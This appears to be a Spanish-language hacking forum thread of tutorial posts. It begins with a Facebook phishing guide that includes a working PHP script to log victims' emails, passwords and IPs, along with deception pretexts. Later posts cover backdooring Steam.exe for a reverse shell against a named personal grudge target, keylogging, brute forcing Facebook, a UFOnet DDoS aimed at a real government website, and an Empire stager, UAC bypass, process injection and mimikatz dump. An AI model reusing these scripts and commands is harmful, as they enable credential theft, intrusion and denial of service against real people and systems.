1- El dominio que deben crear debe ser algo parecido así No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¿porque?
Para que la victima no sospeche que sea una web falsa o algo, pero como que parece ligar verdad.

La cual pueden comprarla en cualquier HOSTING.



2- La victima seguramente nos dirá,

"Pero me sale facebook de nuevo que hago entro con mi cuenta?"

En mi caso le diré "Si", porque es un grupo secreto y no cualquiera entra ahí, y si quieres le mandas un Screenshot de un grupo de facebook original, editas la fuente y todo eso para que sea mas creíble.

La victima ya creído todo nuestro "Cuento" Añadirá sus credenciales.



El punto es el siguiente "Nosotros debemos añadir una redireccion a un grupo de facebook que hemos escogido ejemplo a un grupo de Fans" para que sea 100% creíble y no sospeche nada




Código: php
<?php

$habbo = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$f = fopen("Dark.html", "a");
fwrite ($f, 'Email: [<b><font color="#0000FF">'.$habbo.'</font></b>] Password: [<b><font color="#FF0040">'.$password.'</font></b>] IP: [<b><font color="#FE2EF7">'.$ip.'</font></b>]<br>');
fclose($f);

header("Location: https://www.facebook.com/groups/616258998512511/?ref=br_rs");
?>



Siguiendo con el tema, una ves obtenido las credenciales la tendremos en un archivo llamado "Dark.html" si la subiríamos a un servidor web seria así.



Pero como estoy utilizando en este ejemplo Social Engineer Toolkit nos saldría así

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



¿Bastante sencillo verdad?

Entonces vamos a  pasar al segundo método "POST Explotacion", consiste en enviar un archivo infectado(Payload) a nuestra victima, el payload la cual tiene como función Explotar el sistema en su totalidad para controlarlo remotamente mediante conexiones "Reversas".

En este escenario le daremos paso a "Metasploit Framework"



Les dejare unos POST'S donde les enseñare a como utilizar Metasploit Framework :




Comencemos mi victima en este caso es un "Dotero" que le tengo cólera, y este tipo entra en cabinas publicas especialmente en la numero "8", o pueden utilizar el método de engañar a esa persona como lo hicimos por el Pishing para infectarlo con este método que les enseñare.

Como es una cabina publica cualquier "Persona" puede pagar y adquirir el servicio, entonces lo primero que haré sera es copiar el archivo "Steam.exe"
y compilarlo con una herramienta llamada "Shellter" para añadirle un Payload de conexión reversa entre mi ordenador con  MI IP Publica y mi Puerto de escucha,(Configurando el Router) para poder hacer ataques LAN, y conectarnos al sistema de la victima.

En mi caso lo haré locamente.



POST shellter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Maquina de la victima:



Como vemos el archivo supuesta mente esta esta en esa "Cabina Publica", lo que hacen siempre los Kit Rats es abrir el Steam, pero cuando el ejecute no cargara el Steam, si no que tendremos automáticamente controlado el sistema "Backdorizado".



Ya tenemos todo listo para el proceso de utilizar el método "Keyloggers"



Ya activado el grabador de teclados "Keyloggers", nuestra victima entrara a facebook normalmente.



Pero en otro plano nosotros tendremos las credenciales de usuario:



entonces interpretando las grabaciones del teclado , Datos del Usuario:

Ctrl+Alt+Q = @

User:[email protected]
Pass:mamasita12345


Como vemos no hay complejidad para realizar un la metodología de Ing social basado con la imaginación, siempre y cuando estemos respaldados por una herramienta que nos permita lo siguiente.

Como siempre el ultimo recurso para obtener la contraseña de un objetivo es el conocido
"Brute Force" - que consiste en un ataque con contraseñas que se ejecutaran automáticamente en una herramienta privada que fue liberada el año pasado.

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

( Lo subí en mega, porque al añadirlo en source, bloquea el POST, por la excesiva cantidad de caracteres de la herramienta : ( )



Ustedes seguramente dirán, pero Facebook te bloquea al pedir peticiones añadiendo la confirmación del "Captcha", pues para la suerte de ustedes "NO" por el simple hecho que la herramienta esta basada en las conexiones por "Headers", las cuales funcionan directamente con la colectividad de los "form"



La idea fundamental del Brute Force o Fuerza bruta es la complejidad del diccionario que tengan.
Una ves que hallamos obtenido la contraseña "Les llegara un mensaje a a victima" como este, pero como es source open pueden editar las lineas de los envíos de cabeceras del USER-AGENT les dejo una lista de sqlmap: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Una buena idea para ejecutarlo sin  dejar rastros en el momento preciso es hacerlo en horas de la madrugada o en las horas que la victima NO este, Saludos!

Happy Hacking!!!!!!!!!!!!!!!!!! : )
#94
Gracias por su comentario bro, seguiré subiendo contenidos diarios de mi autoría, Saludos y éxitos.  8)
#95

Saludos hermanos nuevamente, aunque no me respondan y agradezcan mis POST'S : ( estuve alejado del blog tomando unas vacaciones estudiantiles si se puede decir de esa manera jajaja, de ante mano deseo agradecer a cada uno de ustedes por brindarme su apoyo y seguir leyendo mi humilde blog.

En esta oportunidad les enseñare a como crear tu propio servidor "ONION", en tu Sistema Operativo Kali Linux.

Lo primero que debemos tener instalado es "Tor" corriendo en nuestro sistema, como Kali tiene por defecto el navegador no lo tendré que instalar,  pero los que corren un sistema Debian puro o Ubuntu la forma de instalación es:

Código: text
root@browsernet:~# sudo apt-get install tor

Luego de ello debemos entrar a la carpeta donde se encuentra los archivos de configuración de Tor

Código: text
root@browsernet:~# cd /etc/tor/

Luego de ello debemos editar el archivo torrc para configurar nuestra conexión de datos y adjuntar algunas lineas.

Código: text
root@browsernet:/etc/tor# sudo leafpad torrc

Lo primero que haremos sera buscar la siguiente linea: HiddenServiceDir


como podemos ver, estas son las lineas las cuales vamos a modificar:


Lo que debemos hacer es quitarle el signo a la primera y segunda linea de la parte de arriba la cual es # > "Michi", así le dicen en mi País, no se como le dirán en el suyo, luego como pueden observar la segunda linea:


HiddenServicePort 80 127.0.0.1:80


Podemos observar a simple vista que los números 80 son el puerto que ejecutaremos en la salida de nuestro servidor & la IP local del servidor establecida como un Proxy, lo que haremos sera añadir nuestra IP local un ejemplo seria el  siguiente.

HiddenServicePort 80 192.168.1.36:80



Ahora lo que haremos sera iniciar el servidor de TOR:
Código: text

sudo service tor start

 
Una ves iniciado nuestro servidor debemos actualizar nuestro sistema e instalar el servidor apache2
Código: text

sudo apt-get update && sudo apt-get install apache2



una ves terminado  todo el proceso, debemos reiniciar nuestro servidor apache, de la siguiente manera.

Código: text
sudo service apache2 restart 

lo mismo con el servidor Tor.

Código: text
sudo service tor reload

Ahora lo que se preguntaran todos, ¿Cual es nuestra URL onion?
para ello debemos ejecutar nano con permisos de administrador para poder leer el archivo donde se encuentra la URL onion:

Código: text
sudo nano /var/lib/tor/hidden_service/hostname



Como vemos la URL onion de mi servidor es:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
lo que haremos sera probarla en el navegador Tor Browser.


Tenemos nuestro servidor Onion, totalmente LAN : ), cabe decir que si ustedes desean subir archivos a su servidor, deben entrar al directorio:

/var/www/html
   
de igual manera el servidor corre con "Apache" y  "Mysql", como pueden observar en la imagen, para que puedan comprobarlo pueden verlo aquí mismo.


Agradecer no cuesta nada, Saludos : )
#96

Saludos hermanos de underc0de en esta oportunidad les traigo la herramienta llamada "UFOnet" la cual funciona como una "Botnet" de distribución de denegación de servicio, en nuestro sistema operativo GNU/Linux recolectando fallos de servidores web con la vulnerabilidad "Open Redirect" la cual enviara varias peticiones con grandes paquetes a la pagina objetivo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Descarga
Código: text

root@kali:~# git clone https://github.com/epsylon/ufonet
root@kali:~# cd ufonet
root@kali:~/ufonet# ls
root@kali:~/ufonet# cd ufonet
root@kali:~# ./ufonet



una ves descargado y comprobado que todo salio exitoso, vamos a configurar nuestro servidor añadiendo algunas configuraciones pero antes vamos a explicar algunos métodos que consta dicha herramienta.

Busqueda de Boots

Como sabrán esta herramienta consta de una búsqueda de indexiaciones por medio de "Dorks" donde vamos a encontrar parámetros GET  que son vulnerables para realizar este tipo de ataques como son:

    'check.cgi?url='
    'proxy.php?url='
    'validator?uri='
    'checklink?uri='

al realizar dichas consultas vamos a encontrarnos que el buscador por default es "duck", pero también podemos añadir otros parámetros para añadir otros buscadores como lo son bing, google, yahoo, yandex, etc, como son las siguientes:

Código: text

root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'bing'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'google'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yahoo'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yandex'


pero si deseamos hacer una búsqueda avanzada de las DORKS en general que contiene el repertorio de ufonet podemos hacer una búsqueda estándar para añadir mas paginas vulnerables las cuales son las siguientes:

Código: text
root@kali:~/ufonet/ufonet# ./ufonet --sd 'dorks.txt'



como pueden observar esta elaborando una búsqueda general de todas las Dorks encontradas en dicho documento de texto, donde rápidamente se guardara en un archivo llamado "Zombies.txt".

Pero si deseamos tener una conexión anónima en este caso con un proxy que sea directamente con ufonet esta implementado Tor, la cual podemos ejecutarlo de la siguiente manera.

Código: text
./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:9150"


Si no lo tienen instalado pueden ver el siguiente tutorial donde enseño como configurarlo para Kali.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bueno primero que nada, vamos a  ejecutar algunas conexiones default de pruebas de ataques para cargar el servidor y ver algunas peticiones que constan varias variaciones de estructuras, lo que haremos sera ejecutar un comando para obtener una búsqueda relacionada a una DORK como es la siguiente:


Código: text
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url='


luego de ello vamos a ejecutar el siguiente comando para cargar los módulos de los servicios web vulnerables

Código: text

root@kali:~/ufonet/ufonet# ./ufonet -i http://target.com



como vemos los archivos están siendo cargados de manera exitosa en nuestro servidor local, pero también podemos ejecutar  el siguiente comando para elaborar un TEST en el siguiente servicio.

Código: text
root@kali:~/ufonet/ufonet#  ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx" 



sin duda este ataque es muy efectivo ya que va realizar consultas con las listas mas grandes que puede ver en el servidor y es uno de los mas efectivos, pero también podemos ejecutar el siguiente que es aun mas prodigioso si es que se ha configurado bien el buscador de webs vulnerables, si deseamos lanzar un ataque mediante las conexiones de envíos por default podemos añadir lo siguiente:

Código: text
root@kali:~/ufonet/ufonet# ./ufonet -a http://www.peru.gob.pe -r 10 -v



como vemos primero nos carga los paquetes de envíos de las cabeceras, como acabamos de ver, pero al terminar lo siguiente, empezaremos a enviar las peticiones de acuerdo al tipo de threads que hemos realizado, como en mi caso fue 10, se ara una petición de 10 repeticiones:


como vemos en la siguiente imagen la herramienta consta de una website muy conocida llamada "downforeveryoneorjustme", donde nos dirá, si la web esta Down o UP como vemos nos dice que esta down o caída.



pero como siempre es bueno echar ojo en los servicios paso a verificarlo:



Lo interesante son los paquetes que envía y la respuesta que recibe.


entonces el Test del servidor se ha realizado correctamente. espero les haya gustado este POST.

Saludos!
#97


Saludos mis hermanos de underc0de en esta oportunidad les traigo una herramienta llamada "Empire", según el autor data que es un agente de post-explotación PowerShell construido sobre comunicaciones cryptologically seguras y una arquitectura flexible, se parece mucho a metasploit, pero mas se asemeja pupy,  pero este siempre tendrá la sesiones de las victimas, esta herramienta fue presentada en el BSidesLV en 2015.

¿Para que sirve Empire?

Empire implementa la capacidad de ejecutar agentes PowerShell sin necesidad powershell.exe, los módulos de post-explotación de despliegue rápido que van desde los registradores de claves a Mimikatz y comunicaciones adaptables para evadir la detección de redes, todo envuelto en un marco centrado en la facilidad de uso.

sitio oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si desean ver la presentación del manejo de la herramienta, que en verdad es muy buena! pueden visitar el siguiente enlace:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Instalación:

Código: text
root@kali:~# git clone https://github.com/PowerShellEmpire/Empire.git
root@kali:~# cd Empire
root@kali:~/Empire# ./setup/install.sh


como vemos al instalar los módulos del empire automáticamente pasara a descargar los complementos que necesita, para poder ejecutar la herramienta con éxito.



en mi caso algunas ya las tengo instaladas y actualizadas, pero otras no como son las siguientes que mostrare en la siguiente imagen:



en mi caso salio un error en la sintaxis 15 referente al archivo ./setup_database.py, algunas personas siempre ignoran un pequeño error de una linea  y trata de ejecutar el Empire u otra herramienta con normalidad y al final les arrojaría los errores comunes.

Código: text
root@kali:~/Empire# ./empire




yo creo que el 60% se rendiría y no ejecutaría la herramienta, hasta nosotros lo hemos hecho pero estamos aquí referentes para dar el consejo "Lean", si nos dice que no se encuentra dicho archivo lo que haremos sera entrar a la carpeta setup y ejecutar el archivo setup_database.py para instalar la base de datos

Código: text
root@kali:~/Empire# cd setup
root@kali:~/Empire/setup# python setup_database.py




Una ves que términos todo este proceso, pasaremos a configurar e instalar nuestro certificado, en el archivo "cert.sh.

Código: text
root@kali:~/Empire/setup# ./cert.sh




Luego de ello, nos dirigiremos a la carpeta de inicio y ejecutaremos el Empire
Código: text

root@kali:~/Empire/setup# cd ..
root@kali:~/Empire# ./empire




como vemos nos cargar perfectamente sin ningún error, entonces vayamos prácticamente a la acción como se dice en Perú, "Menos floro y mas acción", vamos a configurar nuestro servidor de infección iremos a la sección "Listeners", como podemos observar añadí el nombre initial , ustedes pueden poner lo que gusten.
Código: text

(Empire) > listeners
(Empire: listeners) > info
(Empire: listeners) > set Name initial
(Empire: listeners) > execute
(Empire: listeners) > list





lo que haremos sera interactuar con la plataforma y empezaremos  a buscar e interpretar un archivo ejecutable pero en extensión .bat.

Código: text
(Empire: listeners) > usestager launcher_bat initial


la cual se genero en la ultima linea:
  • Stager output written out to: /tmp/launcher.bat

    entonces abriremos otra terminal y nos dirigiremos a la siguiente carpeta para mover-la al modulo del escritorio

    Código: text
    root@kali:~# cp /tmp/launcher.bat /root/Desktop/




    al ejecutar el movimiento al escritorio,le enviaremos el archivo a nuestra victima, si desean ver el código del payload pueden abrirlo con leafpad en mi caso, ya saben que siempre lo ejecuto mediante nano:
    Código: text

    root@kali:~# cd Desktop
    root@kali:~/Desktop# nano launcher.bat




    bueno continuando con lo siguiente, pasaremos a enviarle el archivo a nuestra victima, en mi caso mi victima estará con un windows 8



    al momento que la victima aya ejecutado nuestro archivo, que por cierto es indetectable por los AV nos dirigiremos a nuestro terminal para ver los servidores de escucha que están conectados, en nuestro caso la victima.
    Código: text

    (Empire: stager/launcher_bat) > agents
    (Empire: agents) > list


    Como vemos al iniciar



    Entonces entraremos al interactuar con nuestra primera victima para ello ejecutaremos la siguiente sintaxis.

    Código: text
    (Empire: agents) > interact 3R3CUZRTP13B1HGV
    (Empire: agents) > rename DC

    una ves aplicado ello, pondremos el comando "help", para ver las opciones que podemos utilizar las cuales son las siguientes:



    Entonces lo que debemos hacer primero es ejecutar el Bypass de UAC para poder escalar privilegios administrativos para añadir algunas de estas opciones, las cuales les serán de mucha utilidad.

    Código: text
    (Empire: agents) >  interact DC
    (Empire: agents) >  usemodule privesc/powerup/allchecks
    (Empire: agents) >  info
    (Empire: agents) >  execute
    (Empire: agents) >  back




    entonces empezara a cargar los módulos de explotación del UAC, como vemos nos aparecen el siguiente mensaje con la cual nos dice que se esta ejecutando los servicios enfocados en cada sección



    una ves cargado pasaremos a ejecutar el  bypass para explotarlo en one.
    Código: text
    (Empire: DC) > bypassuac initial
    (Empire: DC) >


    luego de que cargase lo siguiente e inicie la activación, pasaremos a dirigimos a la lista e interpretaremos con el nuevo proceso llamado UTLZ1UEP1LEXHPKG la cual es el usuario administrativo interceptado.
    Código: text
     (Empire: DC) > agents
    (Empire: agents) > interact UTLZ1UEP1LEXHPKG


    nuevamente  nombraremos él nombre del servicio, como  PhishedUserHigh
    Código: text
    (Empire: UTLZ1UEP1LEXHPKG) > rename PhishedUserHigh

    para culminar vamos a mirar los procesos que corren y como vemos son los procesos administrativos para que ven que lo son.
    Código: text
    (Empire: PhishedUserHigh) > ps
    (Empire: PhishedUserHigh) > back




    en mi caso escogí el proceso explorer que tiene el PID 292, para inyectar mi sesión  y como vemos hemos creado otro servicio con el nombre 1Z2NWDRLUUV1D1KK pero con el proceso cambiado que le otorgamos.
    Código: text

    (Empire: agents) > interact PhishedUserHigh
    (Empire: PhishedUserHigh) > psinject initial 392
    (Empire: management/psinject) > execute





    ahora pasaremos a dumpear del sistema mediante mimikatz, en este caso escogere el usuario administrativo PhishedUserHigh
    Código: text

    (Empire: agents) > interact PhishedUserHigh
    (Empire: PhishedUserHigh) > usemodule credentials/mimikatz/lsadump
    (Empire: credentials/mimikatz/lsadump) > info
    (Empire: credentials/mimikatz/lsadump) > execute
    (Empire: credentials/mimikatz/lsadump) > back




    Esperaremos a que cargue el modulo de dumpeo................ : )



    Esto fue todo por ahora, espero haberles ayudado mucho quise expandir mas este POST, porque me falto algunas opciones mas, pero yo los saque de la referencia de la presentación, ustedes pueden verlo y aprender mas sobre esta herramienta, en fin.

    Un saludo !!! Happy Hackingª
#98


Saludos mis queridos fieles lectores en esta oportunidad vamos a utilizar una herramienta que por excelencia a nivel mundial es una de las mejores para analisis de vulnerabilidades de sistemas operativos en general.

¿Que es Nessus?


Nessus es la plataforma de análisis de vulnerabilidades más confiable para los auditores y analistas de seguridad. Los usuarios pueden programar análisis a través de múltiples escáneres, utilizar asistentes para crear fácil y rápidamente las políticas, programar exploraciones y enviar los resultados por correo electrónico. Nessus soporta más tecnologías que cualquier otro proveedor, incluyendo sistemas operativos, dispositivos de red, hipervisores, bases de datos, tabletas / teléfonos, servidores web y las infraestructuras críticas.


Las características clave incluyen:


    De alta velocidad de Activos Descubrimiento
    Evaluación de la Vulnerabilidad
    Malware / Detección Botnet
    Configuración y Cumplimiento Auditoría
    Escaneo y Auditoría de virtualizados y de nube Plataformas

Descarga : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

como vemos en la siguiente imagen nessus hace años era una plataforma gratis,al igual que burpsuite ahora sabemos que para utilizar todas sus funciones debemos comprar el pack que queramos para poder disfrutar todas las características.



en mi caso descargare en Home use Only que es la version gratuita.



En mi caso descargare el archivo .deb de 32 bits por mi arquitectura de mi ordenador y aceptamos los términos para poder descargarlo.

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~# dpkg -i Nessus-6.4.3-debian6_i386.deb



automaticamente se instalara los repertorios del nessus, como vemos no arroja lo siguiente :
- You can start nessusd by typing /etc/init.d/nessusd start

ese es el comando de ejecución para que nessus arranque en su plataforma web .



Luego ello ya tenemos nessus corriendo, nos dirigiremos a nuestro navegador web de preferencia,en mi caso lo haré con iceweasel

Entonces nos aparecerá un mensaje de certificado que no es seguro, ustedes lo habilitaran es algo muy fácil de hacer, luego ello nos saldrá el login.



una ves de añadir su usuario y contraseña procederemos a ingresar a la siguiente web

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

nos registramos para recibir el código de activación la cual sera enviado a nuestra bandeja de entrada de nuestro correo electrónico, añadimos el código y automáticamente nos cargara los módulos de nessus como podemos observar en la siguiente imagen:



Luego de ello nos aparecerá la interface de nessus.



Entraremos a la sección New Scan



Como vemos tenemos muchos tipos de escaneos disponibles y otros si deseamos pagar para poder adquirir el producto,no cabe duda que es uno de los mas grandes auditores de servicios que existe.

Entraremos a Advance Scan para nuestro testeo de vulnerabilidades.



Como vemos eh creado mi configuracion de la prueba de escaneo en mi caso, añadi la ip de mi maquina virtual en un sistema operativo windows 8.1 , antes de aclarar mi sistema operativo no carece de vulnerabilidad grave, pero hare el testeo porque ando corto de tiempo  y me da pereza bajar un S.O.

Vulnerabilidades



Sin duda nessus es uno de los mejores scanner de vulnerabilidades que existe, como dije mi sistema operativo es Original y carente de vulnerabilidades criticas como los conocidos :

CVE - Common Vulnerabilities and Exposures

Ustedes pueden hacer un testeo de auditoria en sus sistemas para encontrar vulnerabilidades y poder parcharlas para que no sean victimas de ataques.

No obstante nessus puede ser complementada por una herramienta de explotación por excelencia como lo es Metasploit Framework
Pueden aprender a utilizar dicha herramienta de plugins de nessus en msfconsole, en su web principal:




En mi caso como yo ya inicie el escaneo por la plataforma de nessus, simplemente utilice el comando hosts -c address,vulns, para obtener los resultados necesarios para explorarlos, en mi caso mi sistema NO es vulnerable a ningún exploit de explotación remota, como podemos observar en las estadísticas.

Si usted desea auditar desde su terminal o tener mas información al respecto pueden guiarse de esta web oficial de Offensive Security.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ante mano mis queridos fieles lectores en esta oportunidad deseo mandar saludos a todas mis amistades en este mundo de la seguridad informática, no diré nombres, porque ellos saben quienes son y que significan para este servidor, Happy Hacking !! Saludos.
#99


Saludos mis queridos hermanos, en esta oportunidad vamos a utilizar una plataforma totalmente completa en lo que es la auditoria de vulnerabilidades e informathion gathering de un servidor web, con una herramienta totalmente completa que utiliza un pack completo de las conocidas herramientas de pentesting como, nmap,hidra,the harverster,the harvester,sqlmap,cmscan,nitko, entre otras mas.
Sn1per - un escáner automatizado que se puede utilizar durante una prueba de penetración para enumerar y escanear en busca de vulnerabilidades.
CARACTERÍSTICAS:

    Recoge automáticamente de reconocimiento básico (es decir. Whois, ping, DNS, etc.)
    Lanza automáticamente consultas de hacking Google contra un dominio de destino
    Enumera automáticamente los puertos abiertos
    Fuerzas automáticamente bruta sub-dominios y DNS info
    Se ejecuta automáticamente guiones nmap dirigidos contra los puertos abiertos
    Explora automáticamente todas las aplicaciones web en busca de vulnerabilidades comunes
    Automáticamente fuerzas brutas de servicios abiertos todo

Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



una ves descargado, lo extraemos el archivo .zip y le daremos permisos a la carpeta como pueden ver en la imagen, para proceder a instalar la herramienta



una ves ejecutado el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , podemos observar que la herramienta antes de comenzar a instalar actualiza los repertorios de las herramientas que va utilizar, para los que no la tengan en su sistema operativo, sera de gran ayuda para que la herramienta instale por si solas.



Mientras tanto los paquetes nuevos que requiere la herramienta de igual manera pasar a instalar de manera automática para poder ejecutar un mayor análisis de vulnerabilidades.



Lo que haremos sera ejecutar nuestra herramienta para probar su eficacia , ya que a mi parecer esta herramienta tiene un pack completo de análisis en todos los sentidos para los amantes de las auditorias.

#Escenario numero uno

Recopilación del servidor / Informathion Gathering Whois



para localizar nuestra informathion gathering del servidor que vamos a hacer la prueba de concepto elegí al alzar, podemos observar que nos arroja su punto original del servidor DNS donde esta alojado el sitio web, la cual puede ser muy aprovechada si  se desea hacer un Reverse IP lookup, para comprometer y saber que sitio web del servidor deseamos auditar o explotar.

Ejemplo:



Servicio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#Escenario numero dos

Informathion gathering personal del servicio WEB.




The harverster es una herramienta de recopilación del servidor web, que consta de sacar los correos del servicio,personas administrativas y obteniendo información recopilada del servicio Linkedin, la cual puede ser aprovechada para reportar los errores a los administradores mirándolo de una manera ética y profesional.



de igual manera tenemos el dnsenum para obtener mas detalles en general del servidor web.
Llega el turno de nuestro querido y viejo amigo namp, que se encargara de recopilar un mapeo general de los puertos abiertos de nuestro objetivo, detallando los puertos,los servicios y la versión que esta corriendo.





Como podemos observar el testeo de namp esta en modo estándar, por la información que acaba de recopilar pueden notar la acción eficaz de la prueba, que puede ser aprovechada para encontrar versiones y puertos vulnerables a un exploit.

#Escenario numero tres

una ves finalizado el testeo la herramienta pasara a su interface de atacante para obtener los usuarios que corren por dichos servicios mediante un ataque de fuerza bruta.



Interesante verdad¿? el ataque de fuerza bruta que da como resultado el nombre de usuario y que puede ser utilizada para ataques de diccionarios en dichos sectores con herramientas especiales para eso como lo son "Medusa", "Hidra.

#Escenario numero cuatro
Identificación de servicios Firewall



WafWoof, es una herramienta que nos brinda información de que tipo de waf esta utilizando un servicio, para recopilar los source y enlaces de los módulos web para no enviar muchos peticiones para que el firewall no bloqueo nuestra auditoria.



como vemos funciona como "Spider" , con la cual podemos familiarizar y encontrar fallas de manera manual.

#Escenario numero cinco
Explotación del objetivo

en esta sección tenemos a nuestra fiel amiga SQLmap, la cual recopilara la información obtenida del WafWoof para hacer un testeo de explotación con los parámetros encontrados.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fatal error: mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '75' and fk_pk_idioma=2' at line 2] in EXECUTE("SELECT * ,ptx.txt_nombre ,ptx.txt_contenido ,i.txt_nombre as txt_idioma from mod_paquete_especial INNER JOIN mod_paquete_especial_txt ptx ON pk_paquete_especial = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta_pk_paquete_especial INNER JOIN tbl_idioma i ON No tienes permitido ver los links. Registrarse o Entrar a mi cuenta_pk_idioma = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta_idioma WHERE pk_paquete_especial=''75' and fk_pk_idioma=2 ") in/home/lasdunas/public_html/includes/adodb/adodb-errorhandler.inc.php on line

#Escenario numero seis
Research Exploits

damos paso a nitko para encontrar fallas de explotación mas avanzada



Como vemos esta herramienta tiene un sin fin de herramientas que va a proceder a testear,en mi caso dejare hasta aquí el post, para no hacerlo muy extenso.

Deseo aclarar que la herramienta detecta si esas corriendo en un CMS u otro tipo de aplicación para después analizarla de manera positiva.

Si desean pueden ver una parte de la auditoria de esta web en el siguiente link:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un Saludo para todos,no olviden comentar y compartir el blog para que todos disfruten el aprendizaje que les brinda este humilde servidor hasta la proxima !
#100
Vaya, utilice el mantra de igual manera me voto el mismo Error : (